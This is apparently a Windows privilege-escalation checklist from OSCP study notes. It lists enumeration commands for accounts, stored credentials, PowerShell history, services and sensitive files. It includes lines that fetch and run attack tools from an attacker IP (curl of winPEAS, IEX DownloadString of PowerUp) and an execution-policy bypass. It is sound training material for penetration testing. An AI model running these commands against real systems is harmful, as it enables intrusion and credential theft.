// notes/ PrivEsc — Windows
🪟
Checklist
{% hint style="info" %}
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/checklist ↗Checklist
{% hint style="info" %} set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0; {% endhint %}
Basic enum / quick wins
code
01whoami /allcode
01cmdkey /listcode
01systeminfocode
01net user02net user <current user>code
01net groupcode
01Get-Historycode
01ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\{% hint style="info" %} Do this for all available users; Post exploitation as well {% endhint %}
Network and port enum
code
01ipconfig /allcode
01netstat -ano02route printInstalled software and service enum
code
01dir C:\02dir "C:\Program Files"03dir "C:\Program Files (x86)"code
01Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displaynamecode
01Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displaynamecode
01reg query HKLM\Software\Policies\Microsoft\Windows\Installer02reg query HKCU\Software\Policies\Microsoft\Windows\Installercode
01servicescode
01Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}code
01icacls <service binary path>Sensitive file enum
code
01$env:AppKeycode
01gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinuecode
01gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinuecode
01gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinuecode
01gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinuecode
01gci C:\Users\Publiccode
01where.exe /R C:\Windows bash.exe02where.exe /R C:\Windows wsl.exeProcess snooping
code
01Import-Module .\Watch-Command.ps102Get-Process | watch-command -diff -cont -verbose -property "Image Name"- Winpeas
code
01curl 192.168.45.x/winPEAS.exe -o winpeas.exe02.\winpeas.exe- PowerUp
code
01IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks- PrivescCheck
code
01powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'{% hint style="info" %} Last case, dig through event log for events recorded by Script Block Logging. Maybe there will be a password lol. {% endhint %}
- eventvwr
- Applicatioins and Services
- Microsoft
- Windows
- Powershell
- Operational
- Filter current log
- Event 4104